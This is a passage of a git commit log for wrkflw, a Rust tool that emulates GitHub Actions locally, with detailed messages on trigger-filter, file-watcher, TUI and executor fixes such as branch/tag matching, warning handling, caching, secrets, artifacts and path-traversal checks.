HEAD` — for information that changes on `git checkout` and `git tag`,
i.e. basically never. A 40-file save storm was 80 git spawns for no
reason. New `cached_git_state()` on `WorkflowWatcher` with a 3-second
TTL. Not cache-invalidation-on-`.git/HEAD`-event because that would
require whitelisting `.git/` back past the ignore filter and the TTL
does the same job with a quarter of the complexity.

**Windows path separators.** `canonicalize_changed_paths` handed
backslash-separated strings straight to `path_matcher`, and
`glob::Pattern` with `require_literal_separator: true` expects `/`.
So `paths: ['src/**']` silently didn't match `src\main.rs` and every
Windows user would have seen "0 triggered" with no explanation. New
`normalize_separators()` helper runs after `strip_prefix`.

While at it: `WatcherConfig::with_extra_ignore_dirs()` so users can
add `.terraform`, `coverage`, `.next`, `bazel-bin`, etc. without
waiting for us to land each one as a default. `display_workflow_path()`
renders TRIGGERED/SKIPPED labels as repo-relative instead of the
noisy absolute form. `find_repo_root_detailed()` returns a
classified error (`GitNotInstalled` / `Timeout` / `NotInRepository` /
`Other`) so `wrkflw watch` stops telling users "not inside a git
repository" when the real problem was that git wasn't on PATH or the
subprocess hung — that misdiagnosis was sending people down the
wrong fix path every time. Doc comment on `get_changed_files`
spelling out the rename-as-delete+add behavior since `paths-ignore`
users will eventually trip over it. And a pin test for
`workflow_dispatch`/`schedule`/`repository_dispatch` so a future
refactor that starts defaulting `branches:` can't silently break
manual triggers.

Cancellation token and parallel parse are still deferred — both are
larger surface changes and the review called them out as known
follow-ups. Let's not bundle them here.

* fix(trigger-filter,watcher,ui,wrkflw): fix branches+tags OR, kill silent skips from review

The big one first: a push workflow with BOTH `branches:` and `tags:`
set was being evaluated as AND. So if you had

    on:
      push:
        branches: [main]
        tags: ['v*']

the filter would never match *anything*. Branch push? tags axis is
empty (no tag on HEAD), reject. Tag push? branches axis is empty
(detached HEAD, no branch), reject. Elegant symmetry. Completely
wrong.

It turns out GitHub Actions treats that case as OR — the workflow
fires if the branch matches `branches:` OR the tag matches `tags:`.
Which is the only thing that makes sense, because a push is on a
branch *or* a tag, never both simultaneously. The previous
sequential-AND check was literally unsatisfiable for the combo case
and no test covered it, so we shipped a feature that silently
skipped an entire class of real-world workflows.

Extract `ref_filters_pass` that handles all four combinations
explicitly and pin it with four regression tests covering branch
push, tag push, miss, and `tags-ignore` exclusion. Update
`explain_filter_failure` to render "neither ref axis matched" for
the combo case so the diagnostic actually mentions both axes
instead of just one.

While at it, plug the rest of the review punch list.

Retire the `find_repo_root` Option wrapper and migrate every call
site (CLI run prefilter, CLI watch, TUI diff-filter) to
`find_repo_root_detailed`. The wrapper collapsed git-not-installed,
timeout, and not-in-repo into one Option::None, which sent users
down the wrong fix path for three of the four failure modes. The
TUI now surfaces the classified error via `DiffFilterOutcome::
Failure` instead of silently showing "0/N would trigger".

Gate the "diff base = HEAD on dirty tree" info log on a `verbose`
parameter threaded through `get_default_diff_base` and
`auto_detect_context_default_base`. The CLI opts in via its
`--verbose` flag; the TUI passes `false` so a hot-path toggle
doesn't flood the log pane on every invocation. This was a
papercut, not a bug, but it was loud.

Move `process::exit` out of `build_event_context` and its helpers.
The function now returns `Result<EventContext, String>` and the
orchestrator owns the exit policy. Helpers that call `exit` from
deep inside are untestable without spawning subprocesses, and we
were accumulating them for no good reason.

Canonicalize `WatcherConfig::workflow_dir` once in `from_config` so
the trigger cache's `HashMap<PathBuf, _>` keys are stable when the
user passes a relative or symlinked workflow directory. Not a bug
in the current CLI (which always passes an absolute path), but the
foot-gun was there for embedders and it was cheap to remove.

Introduce `ShutdownSignal` — a lightweight cancellation handle
backed by `tokio::sync::watch::channel::<bool>`. `WorkflowWatcher::
run` now takes one as a parameter and observes it via
`tokio::select!` inside the idle wait, so triggering cancellation
wakes the loop immediately instead of parking until the next fs
event. The CLI passes `ShutdownSignal::never()` because it still
relies on `process::exit` from Ctrl+C; long-lived hosts (TUI,
future daemon, tests) construct a real signal.

The first implementation of `ShutdownSignal` used `tokio::sync::
Notify` and had a nasty trigger-before-wait race: `notify_waiters()`
only wakes currently-parked tasks, so a caller that triggered
shutdown and then spawned a task that called `wait()` would park
forever. The watch-channel version stores the latest value, so a
subscriber that joins after trigger sees the fired state on the
very next `wait_for` poll. Pinned by
`wait_after_trigger_sees_triggered_state_immediately` so a future
refactor can't silently reintroduce it.

Split the 1884-line `watcher.rs` into five focused submodules with
their own tests: `ignore` (default ignore set + path filter),
`paths` (canonicalization + separator normalization +
display_workflow_path), `event_kind` (notify event classification),
`trigger_cache` (per-cycle parsing cache), and `setup`
(subtree-by-subtree watch registration). Everything is `pub(crate)`
so the public surface is exactly what `lib.rs` re-exports. Nothing
clever, just stop pretending one file is a reasonable home for
1200 lines of hot-path logic.

Add an end-to-end watcher pipeline test
(`end_to_end_pipeline_delivers_watch_event`) that spins up a
tempdir repo, starts the watcher, touches a file in a pre-existing
subtree, and asserts the callback receives a `WatchEvent` with the
changed file. Plus `run_returns_when_shutdown_signal_is_triggered_
before_any_event` to pin the cancellation interrupt path. Both
tests run under `tokio::task::LocalSet` + `spawn_local` because
`run()` is `!Send` (the executor future holds `dyn ContainerRuntime`).

Document the Ctrl+C resource-leak caveat in `wrkflw watch --help`
— a cycle in flight when the user interrupts will get killed by
the OS without running the executor's cleanup, and users who see
orphaned containers deserve to know why.

All tests green (trigger-filter 84, watcher 39, ui 22, wrkflw 3);
clippy clean.

* fix(trigger-filter,watcher,ui,wrkflw): plug the last silent-skip holes and stop sprinkling constants

Another pass over the diff-aware / watch-mode PR after review. The
recurring theme is the same one the previous 24 fix-ups have been
chasing: warn-and-proceed where we should fail loud, plus a pile
of hardcoded constants that drifted across three call sites because
nobody owned them.

It turns out `--event` without `--diff`/`--changed-files`, and
`pull_request` without `--base-branch`, were both still taking the
log-a-warning-and-run path. In a CI script the warning is invisible
and the user sees a session-long stream of "0 triggered" with no
idea why. Same shape in `get_changed_files`: when `ls-files --others`
failed (safe-directory config, transient permission glitch) we
discarded the error in an `if let Ok(_)` block and dropped every
untracked file from the changed set, silently breaking `paths:`
filters for brand-new files. Not great.

Ctrl+C in `watch` was the other big one. We were using
`ShutdownSignal::never()` and relying on the global cleanup
handler's `process::exit(0)` to tear everything down, which meant
a workflow mid-execution got killed by the OS before the executor's
Docker/tempdir cleanup could run. Install a real
`tokio::signal::ctrl_c` handler that triggers the watcher's
shutdown; the global cleanup still runs after `run()` returns, so
we get a clean two-phase teardown instead of an orphaned-container
parade.

While at it, gather every stray constant (`GIT_COMMAND_TIMEOUT`,
`GIT_STATE_CACHE_TTL`, the glob recompile cost, the hardcoded
`"push"` in the TUI) into a single `TriggerFilterConfig` struct and
thread it through the three call sites (CLI prefilter, watcher hot
loop, TUI diff-filter). Having the same five numbers live in three
different places is not my idea of configurability. The config
also owns a process-wide LRU of compiled trigger configs keyed by
`(path, mtime)`, so toggling the TUI filter or re-running a watch
cycle no longer re-parses every YAML and recompiles every glob.

The watcher picks up three other fixes in the same spirit. The git
state cache now keys on `.git/HEAD`'s mtime on top of the TTL, so a
`git checkout` inside the 3s window is caught on the next cycle
instead of evaluating `branches:` filters against the pre-checkout
branch. The debouncer grows bounded (8192 pending paths by default)
and reports per-cycle drops via `WatchEvent.dropped_events` so a
`cargo clean && cargo build` burst can't grow the pending set to
tens of thousands of PathBufs. And the trigger-cache refresh task
now preserves the *previous* cache on panic instead of returning
`HashMap::new()` — a panicking refresh was previously forcing the
next cycle to re-parse every workflow from scratch, which is the
kind of performance cliff you only notice after the bug report.

Parser learned an allowlist of the documented GHA events and warns
(not errors — GHA adds events faster than we update lists) on any
name outside it, so a typo like `pul_request` surfaces once
instead of producing silent "no matching event" diagnostics
forever. `--changed-files` entries now get validated up front:
absolute paths, Windows drive letters, and `..` components get
rejected with a clear error instead of silently failing every
`paths:` glob.

TUI gains a working event selector. The `diff_filter_event` field
was sitting there hardcoded to `"push"` with a comment about
"future UI" — which is a nice way of saying the TUI was silently
lying about which pull_request/workflow_dispatch/schedule workflows
would run. Shift+D now rotates through the six common events and
re-runs the evaluation against the new one. The log buffer also
grew a cap (5000 lines, enforced at every `mark_logs_for_update`
call site) so a long-lived TUI with a lot of diff-filter toggling
doesn't slowly leak memory.

New tests cover every new behavior: LRU hit + mtime invalidation,
`normalize_user_changed_file` rejecting the bad shapes, the unknown
event warning, the debouncer cap counting drops without counting
deduped paths, HEAD-mtime cache invalidation, and the TUI log cap.
Full workspace still green, clippy silent, fmt clean.

Please don't add more file-local constants to this pipeline. Put
them in `TriggerFilterConfig`.

* fix(trigger-filter,watcher): plug parser, git, and worktree silent-skip holes

Another round of review fallout. Six things were wrong, bundled
because they all share the same failure mode: silently producing
"0 triggered" for the wrong reason and sending users chasing a
flag they never needed.

**`on: {}` and `on: []` were accepted at parse time** and then
surfaced as "Workflow does not listen to any events" from the
evaluator — with no workflow path, no YAML context, nothing. GHA
rejects both at upload time. Reject them here too, at parse,
where the error actually carries the file path and the user has
something to grep for.

**`git diff --name-only` and `git ls-files --others` were
newline-terminated.** So a file called `foo\nbar.txt` got
reported as two bogus half-entries, and any non-ASCII filename
came back as `\302\244`-style octal escapes that no `paths:` glob
could ever match. The fix is three characters: `-z`. Rip out the
old `parse_lines` helper and route everything through a new
`parse_nul_separated` that splits on NUL and tolerates the
trailing NUL git sometimes emits. Pinned with a real-git-repo
end-to-end test that commits a file whose name contains a
literal newline and asserts it survives the round trip.

**`head_mtime` stat'd `.git/HEAD` directly**, which returns None
on every linked worktree because in that layout `.git` is a
regular *file* containing `gitdir: /abs/path/to/real/gitdir`.
The watcher's git-state cache then served stale `(branch, tag)`
pairs until the bare TTL expired. Parse the pointer, resolve
relative paths the same way git does (against the `.git` file's
parent), and stat the real HEAD. Plain repos are unchanged.

**The `buffer_unordered` block in watcher.rs had a comment
claiming "Each future wraps a `tokio::spawn`".** It doesn't.
That's actively *load-bearing* — spawning would detach the
futures from the stream and let max_concurrent_executions be
silently ignored. Rewrite the comment to say what the code
actually does and why, so the next refactor doesn't "fix" it
into an unbounded fork bomb. Please don't do that.

**The path-filter diagnostic told users to "pass --diff or
--changed-files"** even when they had *already* passed `--diff`
and it had just come back empty. Confusion ensues. Add
`EventContext::changed_files_explicit`, set it to `true` in
every constructor that actually ran a diff (the three lib.rs
helpers and the watcher's in-tree path), and split the
diagnostic into two cases so "no diff run yet" and "diff was
empty" read differently.

While at it, mark `EventFilter`, `WorkflowTriggerConfig`, and
`TriggerMatchResult` `#[non_exhaustive]`. No external crate
constructs them today — they only read — so this costs nothing
now and buys room to add fields without a major bump later.
`EventContext` stays exhaustive because the watcher builds it
via struct literal and I'm not rewriting that.

Every fix has a pinned test. `cargo test --workspace` is
629/629. `cargo clippy --all-targets` clean. `cargo fmt` clean.

* fix(trigger-filter,watcher,ui,wrkflw): kill dead plumbing and unlock the pattern cache

Staff-level review of the diff-aware watch branch came back with a
pile of findings. Most were easy, but three of them were actually
embarrassing and needed to go before anyone else looked at this.

First, `PATTERN_CACHE` was holding its mutex *across* the blocking
YAML parse + glob compile in `load_trigger_config`. The whole point
of a process-wide LRU is that concurrent callers hitting different
files don't pay for each other's parses — and we were doing the
exact opposite. One slow network-mounted workflow file would stall
every other caller in the process until it finished. Release the
lock on a miss, parse, re-acquire to insert. Racing duplicate
parses on the same file are harmless because late-writer-wins
produces the same value.

Second, `TriggerFilterConfig` shipped two config knobs —
`git_timeout` and `strict_missing_context` — that had builder
setters, had unit tests pinning the builder setters, and were read
by *absolutely nothing* in the library. The timeout lived as a
file-local const in `git.rs` and strict-mode was implemented
entirely in the CLI. Shipping non-functional config knobs is
precisely the kind of drift this crate has been iteratively
patching, so I deleted them rather than half-wiring them. If
anyone ever needs the git timeout override, thread `Duration`
through `run_git` first and add the field at the same commit.

Third, `KNOWN_GHA_EVENTS` contained `pull_request_comment`, which
is not a real GitHub Actions event. Comments on PRs arrive as
`issue_comment` (PRs are issues). Leaving this in the typo-
detection allowlist silently masked the exact warning the function
exists to produce. One-word fix, regression test pinned.

While at it, I cleaned up the other findings:

- Library logging coupling: `collect_unknown_event_warnings`
  (renamed from `warn_on_unknown_events`) and
  `get_changed_files_with_warnings` no longer dual-emit via
  `wrkflw_logging::warning` AND the return value. They collect
  warnings as data; hosts own the rendering policy. Warnings now
  ride through a new `WorkflowTriggerConfig::warnings` field in
  addition to `EventContext::warnings`. The CLI prefilter renders
  both. The one remaining library log call is the verbose-gated
  `info!` in `get_default_diff_base` — opt-in, informational, not
  dual-emission, and fixing it requires signature cascades I
  didn't want in this commit.

- `Debouncer::MAX_SETTLE_ROUNDS` was hardcoded to 3. That was
  tuned for the default 500ms debounce (3 × 500 = 1.5s worst
  case) but a user passing `--debounce 5000` would see a 15s
  worst-case drain delay under sustained churn. Replaced with a
  wall-clock `MAX_SETTLE_BUDGET = 1500ms` and a dynamic round
  cap derived from the debounce window. Preserves the old
  behavior at 500ms and caps long windows correctly.

- `head_mtime` was reachable only via `git::head_mtime`, with the
  watcher reaching into a sibling crate's `pub` module. Re-export
  at the crate root so the coupling is explicit.

- `normalize_user_changed_file` didn't reject embedded NUL bytes.
  NUL is not a valid pathname byte on any supported platform, and
  letting one through would only produce downstream confusion.
  Reject at the boundary with the rest of the input validation.

- `wrkflw watch` had no CLI flag for `extra_ignore_dirs`. The
  watcher supported the knob but users couldn't pass extras
  without patching source. Added `--ignore-dir`, comma-separated
  or repeated.

- `apply_activity_type` was a one-line function called from one
  site. Inlined it.

- `cycle_diff_filter_event` re-ran the evaluation by calling
  `toggle_diff_filter` twice in sequence — correct but cryptic.
  Extracted `rerun_diff_filter_if_active` so the idiom is named
  for what it does.

All 332 tests in the workspace still pass, plus the new
regression pins. Clippy clean, fmt clean.

* fix(ui,watcher): plug TUI warning drop + kill double-toggle fragility

Another review pass. The TUI diff filter was *silently* dropping
every `EventContext::warnings` and every `WorkflowTriggerConfig::warnings`
on the floor — exactly the silent-skip failure mode this entire PR
has been fighting for 28 commits. The library deliberately routes
those diagnostics through struct fields instead of logging them
directly, because hosts own the rendering policy. The CLI prefilter
at crates/wrkflw/src/main.rs does the right thing. The TUI just
didn't.

It turns out that 'hosts own the rendering policy' is a contract
the compiler can't enforce. A git ls-files --others safe-directory
rejection, an 'on: pul_request' typo, a corrupted index — none of
it reached the log pane. User saw '0/N would trigger' with no clue
why.

Let's fix that. DiffFilterReport grows a warnings: Vec<String>
field. evaluate_diff_filter now drains context.warnings via
mem::take and harvests each parsed config's .warnings with the
workflow path prefixed, then check_diff_filter_results renders
them under a 'Diff filter: N warning(s)' line, mirroring the CLI
prefilter byte-for-byte. New regression test pins it.

While at it, rerun_diff_filter_if_active was implemented as two
consecutive toggle_diff_filter() calls. Clever. Also fragile: the
whole thing worked only as long as toggle_diff_filter stayed purely
idempotent in opposing directions, and a future side effect
(metrics, tracing, throttle) would have silently broken the rerun
path with zero compile-time signal. Extract spawn_evaluation() and
abort_in_flight_evaluation() as named helpers so the control flow
matches the intent. The existing abort-flag regression tests still
pin the tricky state-machine invariants through the refactor.

And the Debouncer::MAX_SETTLE_BUDGET doc claimed a hard 1.5s cap
on drain latency that the code doesn't actually enforce when the
user passes a debounce window longer than the budget — a single
tokio::time::sleep is not preemptible and the inner sleep runs the
full user-supplied duration. This is not great, but the alternative
(chopping up the inner sleep) would starve the legitimate coalescing
cases. Soften the doc to describe the real worst case instead of
lying about a cap. The pinning tests already cover both short- and
long-window paths.

Minor: help overlay documents 'd' (toggle diff filter) but not
Shift+D (cycle event). Add the missing line.

* fix(trigger-filter,watcher,wrkflw,ui): plug review holes and enforce warning drain

A code review turned up three real correctness bugs and a handful
of latent traps. Rather than patch them piecemeal, fix the whole
batch in one go so the contract that ties them together — "never
silently drop a diagnostic" — is actually load-bearing in the type
system and not just a convention nobody remembers to follow.

The three correctness bugs first:

1. `cached_git_state` was capturing `head_mtime` *after* the two
   git reads. The doc comment claimed this was fine because "a
   checkout between the read and the store will show up as an
   mtime mismatch on the very next call" — it turns out the
   comment was wrong. If a checkout lands between the branch/tag
   reads, we store the post-checkout mtime alongside the
   pre-checkout branch, and the very next lookup's stat matches
   the stored value and happily serves the stale branch until
   the TTL expires. Move the mtime capture *before* the git
   reads so a race produces a visible mismatch. Regression
   test interleaves a real `git checkout` between cache calls.

2. `collect_workflow_files_blocking` was returning
   `Err(NoWorkflows)` for an empty directory. Watch mode's
   entire value proposition is "react to files that don't exist
   yet", so refusing to start on an empty `.github/workflows`
   is actively wrong. Worse: mid-session, if the user deleted
   every workflow file, the rescan failed, the watch loop fell
   back to the stale snapshot, and `refresh_trigger_cache_blocking`
   retained the deleted entries in the compiled-pattern cache.
   So the evaluator kept running against workflows that no
   longer existed. Let's fix that. Empty dir is now `Ok(vec![])`,
   the watcher logs an info line and carries on, and the
   `retain` step correctly evicts stale entries.

3. The pattern cache was keyed on mtime alone. On FAT32 and
   some SMB/NFS configs, two edits within the mtime resolution
   window (1-2 seconds) collide, and the second parse gets
   served a stale compiled config. Combine `(mtime, len)` as
   the key — size changes catch the overwhelming majority of
   iterative edits, and it's free because we were already
   reading the metadata. A content hash would close the
   remaining gap but would require a full file read on every
   lookup, which is precisely what the cache exists to avoid.

The bigger structural change is the warning-drain contract.
The trigger-filter crate routes non-fatal diagnostics (unknown
event names, `git ls-files --others` failures) through struct
fields instead of calling `wrkflw_logging::warning` directly,
so hosts own the rendering policy. That's the right design.
But it was enforced entirely by convention, and convention is
not a type system.

Proof: `refresh_trigger_cache_blocking` in the watcher was
silently dropping `WorkflowTriggerConfig::warnings` on the
floor. Nobody noticed because the field was a plain
`Vec<String>` and forgetting to iterate it had no consequences.
Exactly the silent-skip mode the rest of this PR exists to
prevent.

Let's fix that too. New `MustDrainWarnings` newtype with a
`debug_assertions`-gated `Drop` impl that `eprintln!`s when a
non-empty buffer is dropped without being observed via `take()`.
Release builds carry zero overhead. Tests and CI catch the
regression immediately. `EventContext::warnings` and
`WorkflowTriggerConfig::warnings` now use it, every host drains
explicitly (`take()`, not read-only iteration), and the watcher
site that was dropping warnings on the floor now routes them
through `wrkflw_logging::warning` at insert time.

One subtlety: the library's LRU cache stashes a clone of the
parsed config alongside the original it returns to the caller.
The clone's warnings would otherwise trip the Drop check on
eviction. Drain them at insert time — the returned original
still carries the full set for the first observer, and
subsequent cache-hit callers see empty warnings, which is the
correct UX (a first-parse diagnostic should not be re-logged
on every cache hit).

While at it, a few opportunistic cleanups the review flagged:

- `run_trigger_prefilter` returns `Result<PrefilterDecision,
  String>` instead of calling `std::process::exit` from half
  a dozen sites deep inside the body. The flag matrix is now
  unit-testable without spawning a subprocess; three new
  tests pin the "directory path", "missing path", and
  "non-matching skip" branches.

- The `--strict-filter` / `--no-strict-filter` coalescing
  was duplicated across the `run` and `watch` handlers. Extract
  `effective_strict_filter(strict, no_strict)` so a third host
  can't pick up a slightly different version of the same
  bool-toggle pattern.

- `normalize_user_changed_file` was accepting whitespace-only
  and empty path components (`src/   /foo.rs`, `src//foo.rs`,
  trailing slash). These silently fail every `paths:` glob at
  evaluation time — exactly the kind of input the function
  exists to reject up front. Reject them with a clear "your
  flag was wrong" message.

640+ tests passing across the workspace, clippy clean with
`-D warnings`. Nine new tests cover the fixes, each with a
comment naming the prior failure mode so a future refactor
can't silently regress them.

* fix(trigger-filter,watcher,wrkflw): plug the last six review holes

Review pass flagged eight items. Six code fixes, two coverage
gaps — close all of them so the branch can land without carrying
documented regressions.

The biggest one: the `PATTERN_CACHE` docstring promised that the
CLI, the TUI, and the watcher all shared one parse per (path,
mtime) across the process. It turns out they didn't. Each host
handed `load_trigger_config_cached` a different `PathBuf` shape
— raw user input vs relative `read_dir` output vs canonicalized
notify paths — so each host effectively maintained its own
de-facto private cache entry. The cross-host sharing was pure
aspiration.

Fix is to canonicalize inside the cache lookup via
`canonicalize_allowing_missing` (promoted out of the watcher
crate since three consumers need it now) and rewrite
`workflow_path` back to the caller's original form on return so
UI labels still show what the user typed.

Two more loop-discipline oversights in the watcher.
`debouncer.drain().await` sat outside any `tokio::select!`
against the shutdown signal, so Ctrl+C during an active drain
had to wait up to the full debounce window before the loop
observed it. Every other await in `run()` is cancellation-aware
— this one was the last outlier. And the per-cycle callback
supervisor was a detached `tokio::spawn`: correct on the happy
path, but a stuck reporter accumulates one task per cycle
forever because the runtime's own reaper is the only thing
polling the handle. Now held in a `JoinSet`, reaped via
`try_join_next` at the top of each iteration, with a one-shot
warning when the backlog crosses eight.

The rest is smaller. `--max-pending-events` no longer advertises
a misleading `default: 0` in `--help`; the flag is
`Option<usize>` and `Some(0)` is explicitly rejected since a
zero cap would drop every event. The parser gets a doc note
explaining why the duplicate-event-key concern the reviewer
raised is not reachable on `serde_yaml >= 0.9.4` —
`parse_workflow` errors upstream before ever hitting
`parse_events`. Don't remove it; add the HashSet-walk defence
only if someone swaps in a permissive YAML loader.

Two new tests pin the `PATTERN_CACHE` concurrency contract and
the `--diff-head` without `--diff-base` branch in
`build_event_context`. Both were docstring claims that nothing
actually exercised, which is how these things rot in the first
place.

Version bump to 0.8.0 and the README breaking-change section
are deferred to a follow-up PR so the release ceremony isn't
entangled with the code review.

* fix(trigger-filter,watcher,wrkflw): plug four more review holes

Four things the previous round missed, in order of how much they
would have hurt in production.

The callback supervisor JoinSet in the watcher had a warning
threshold but no hard cap. That's cute when the reporter is
*momentarily* slow, but a truly wedged reporter (deadlocked file
sink, stuck network webhook) just accumulates one supervisor per
cycle forever — the warning never reclaims anything, and memory
grows for the life of the session. Add `SUPERVISOR_HARD_CAP = 128`
and drop the current cycle's `WatchEvent` when we hit it. Loud
error, one-shot latch with hysteresis on the reclaim path, the
watch loop keeps running. Not pretty, but the alternative is
eventually having the OOM killer express an opinion.

`parse_nul_separated` was calling `from_utf8_lossy` on every
record, which silently replaced invalid UTF-8 bytes with U+FFFD
and left the file in the change set under a name that could not
match any real glob. This is the exact "silently lying about
which workflows would run" failure mode the rest of the crate
has been fighting, and it was hiding right inside the NUL
parser. Collect the lossy names in a separate list and surface
them via `EventContext::warnings` so the user at least sees
*which* file was dropped from the filter's view.

Strict-filter default-on (`wrkflw run --event push` now exits
1 without `--diff`/`--changed-files`) is a visible CLI behavior
change and the commit message was the only place it was
documented. That's not great. Add a BREAKING_CHANGES.md entry
with migration examples for each escape hatch, exit-code
semantics, and a pointer at `--no-strict-filter` for scripts
that cannot move yet.

While at it, flesh out the `LOG_BUFFER_CAP = 5000` comment in
the TUI (why not 1000, why not 20000, what the two dominant
log sources are), extract the supervisor constants to module
level so they can be reasoned about, and add tests the review
flagged as missing: a compile-time invariant on the supervisor
cap ordering, a runtime test that shutdown still unblocks
`run()` when the reporter callback is wedged (release-gated
blocking thread so cargo can reap it), and three prefilter
tests pinning the strict-mode rejection paths for
`--event`-alone and `pull_request`-without-`--base-branch`.
2026-04-11 20:27:34 +05:30
Gokul
faf1af6ff5 fix(validators): reject non-mapping env values in validate (#90)
It turns out that `wrkflw validate` was happily accepting
`env: VAR=value` — a bare string — when GitHub Actions *only*
allows mappings for env. The reason is that the validate path
(evaluate_workflow_file) runs its own structural validators
but never actually checks the type of env fields. The JSON
schema gets it right, but it's only wired up in the parser
path, not the validator.

Add a validate_env() helper that checks env is either a YAML
mapping or an expression string (${{ }}), and wire it into
all three levels: top-level, job-level, and step-level. Tests
included for each.

Closes #89
2026-04-06 22:17:18 +05:30
Gokul
36c1aa16f3 feat(executor): add artifact, cache, secrets, and inter-job output support for GitHub Actions emulation (#88)
* feat(executor): close major GHA expression and inter-job gaps

The expression evaluator was basically living in a fantasy world
where every step succeeds, secrets don't exist in expressions,
and jobs can't talk to each other. That's not how GitHub Actions
works, and it meant a *lot* of real-world workflows would silently
produce wrong results or just fail to resolve context variables.

Here's what was broken and what's fixed:

Step outcome/conclusion were hardcoded to "success" — always.
So `if: steps.build.outcome == 'failure'` would never be true,
and `continue-on-error` semantics were completely wrong.
ExpressionContext now tracks real outcome (before continue-on-error)
and conclusion (after). The success()/failure()/cancelled() builtins
now consult actual job state instead of returning constants.

secrets.* was not available in expressions at all. You could use
SecretSubstitution for env var injection, but `if: secrets.TOKEN`
in a conditional? Nope, just resolves to null. Pre-resolve all
referenced secrets into a HashMap at job start and thread it through
the expression context. Evaluator stays synchronous.

needs.* context didn't exist. Job outputs were computed and then
thrown away — nothing flowed between job batches. Add outputs field
to JobResult, resolve job-level output mappings from step outputs,
accumulate across batches in the main execution loop, filter to
declared needs dependencies, and wire into ExpressionContext.
jobs.* context gets the same treatment for free.

While at it, add three new modules that were completely missing:

- artifacts.rs: Local ArtifactStore for actions/upload-artifact
  and actions/download-artifact emulation. Filesystem-based,
  Arc<RwLock> for cross-job sharing.

- cache.rs: Persistent CacheStore under ~/.wrkflw/cache/ for
  actions/cache emulation. SHA-256 keyed with prefix matching
  for restore-keys.

- workflow_commands.rs: Parser for ::error::, ::warning::,
  ::set-output::, ::add-mask::, ::group:: and friends from
  step stdout. Handles stop-commands/resume semantics.

414 tests pass, 0 failures, clippy clean.

* fix(executor): fix matrix job context gaps and parameter explosion

The previous commit added expression context enrichment (secrets,
needs, step outcomes) but only wired it into the non-matrix execution
path. Matrix jobs — arguably the *most common* GHA pattern — were
silently getting empty contexts for everything. So secrets.* in a
matrix job? Null. needs.* from an upstream job? Null. steps.X.outcome
after a failure? "success". Brilliant.

It gets worse. Job outputs were keyed by job_result.name, which for
matrix jobs is the display name ("build (os: ubuntu)") rather than
the canonical job key ("build"). Since build_needs_context looks up
by the canonical name from job.needs, matrix job outputs were being
accumulated and then *never found* by downstream jobs.

While at it, unknown step IDs were defaulting to "success" instead
of null, which means `steps.nonexistent.outcome == 'success'` was
true. That's not how GitHub Actions works.

Here's what's fixed:

- Thread secrets, needs context, and step status tracking through
  MatrixExecutionContext into execute_matrix_job. Pre-resolve secrets
  once before the parallel fan-out, not per-combination.
- Add canonical_name field to JobResult and key the accumulation maps
  by it. Matrix combinations use last-write-wins, matching GHA.
- Track step_status_map and job_status_str in the matrix step loop,
  mirroring what execute_job already does.
- Resolve job outputs in execute_matrix_job instead of returning
  an empty HashMap.
- Thread secrets into execute_composite_action (GHA composites
  inherit the calling workflow's secrets).
- Fix unknown step ID fallback from "success" to Null.
- Refactor preprocess_expressions (10 params → 3) and
  evaluate_condition_with_context (9 params → 2) to accept
  ExpressionContext directly. Every new context dimension was
  requiring changes to 30+ call sites. Not anymore.

274 tests pass, clippy clean.

* fix(executor): address review findings from GHA emulation PR

The previous two commits closed a bunch of GHA expression gaps, but
the review turned up several things that shouldn't ship as-is.

The worst offender: execute_composite_action was passing
step_statuses: &HashMap::new() and job_status: "success" as
*constants* into every step execution. So steps.X.outcome inside
a composite action? Always Null. success()/failure()? Always
true/false. Composite actions with conditional steps based on
prior step results were quietly broken.

Fix that by tracking composite_step_statuses and
composite_job_status within the composite loop, same pattern as
execute_job and execute_matrix_job.

While at it:

- Extract record_step_status() to deduplicate ~15 identical lines
  of StepStatus-to-string conversion + map insertion that were
  copy-pasted between execute_job and execute_matrix_job. Those
  were one edit away from diverging.

- Derive Copy on StepStatus (it's a fieldless enum — cloning it
  was just noise) and add Display so we stop writing the same
  match arm in three places.

- Pass actual job_status_str into resolve_job_outputs instead of
  hardcoding "success". If a job output expression references
  success()/failure(), it should get the real answer.

- Change CacheStore::new() from Option<Self> to Result<Self, String>
  so callers can actually tell *why* cache init failed instead of
  getting a silent None.

- Downgrade artifacts and cache modules from pub to pub(crate) —
  they're not wired into the engine yet, so exposing them as public
  API is just asking for someone to depend on an unstable interface.

- Replace Box::leak in expression.rs tests with lazy_static
  constants. The leaks were harmless in practice but fragile if
  anyone ever puts empty_ctx() in a loop.

274 tests pass, clippy clean.

* feat(executor): wire up artifact, cache, and workflow command modules

Three modules — artifacts.rs, cache.rs, workflow_commands.rs — were
sitting in the crate fully implemented, fully tested, and fully
*unused*. 751 lines of dead code that the compiler was rightly
complaining about. Let's fix that.

ArtifactStore now gets created per workflow run and threaded through
the entire execution context chain (execute_job_batch → job_with_matrix
→ matrix_job → StepExecutionContext). actions/upload-artifact and
actions/download-artifact are emulated inline in execute_step(),
following the same pattern as actions/checkout.

CacheStore is stateless (filesystem-backed at ~/.wrkflw/cache/), so
it gets created on-demand — no threading needed. actions/cache does
restore-or-save in one shot and writes cache-hit to GITHUB_OUTPUT.
Not the full dual-phase model GHA uses, but good enough for local
emulation.

Workflow commands (::set-output::, ::error::, ::warning::, etc.) are
now parsed from step stdout via process_workflow_commands() in all
three step loops (execute_job, execute_matrix_job, composite action).
The deprecated ::set-output:: feeds into step_outputs_map *before*
GITHUB_OUTPUT file processing, so the modern mechanism takes
precedence. ::add-mask:: is logged but not wired to SecretMasker yet
because that requires Arc<Mutex<>> wrapping — deferred to a follow-up.

While at it, added preprocess_with_value() so action with: params
get ${{ }} expression resolution before being used by the emulation
branches.

* fix(executor): fix review findings — cache lifecycle, secret duplication, path traversal

The PR review flagged several real issues. Let's go through them.

CacheStore was being created *per step* inside execute_step, while
ArtifactStore was sensibly created once per workflow run. This meant
parallel matrix jobs would race on the same ~/.wrkflw/cache/
directory with zero coordination. Promote CacheStore to per-run
lifecycle matching ArtifactStore, threading it through
JobExecutionContext → MatrixExecutionContext → StepExecutionContext.

resolve_secrets_for_context was called once in
execute_job_with_matrix (for the matrix path) and then *again* inside
execute_job (for the non-matrix path), completely wasting the first
resolution. Move the call before the matrix/non-matrix branch and
thread the result via a new secrets_context field on
JobExecutionContext.

ExpressionContext was constructed verbatim ~10 times across
engine.rs — 8 fields, every single time. Every new field meant
updating all 10 sites. Add expr_context() and
expr_context_with_env() methods to StepExecutionContext so
this boilerplate collapses to one-line calls.

While at it, add path traversal and symlink protections:
walk_files (artifacts) and copy_dir_contents (cache) now skip
symlinks; artifact upload validates glob results are within the
workspace via canonicalization; cache save/restore validates paths
don't escape the workspace.

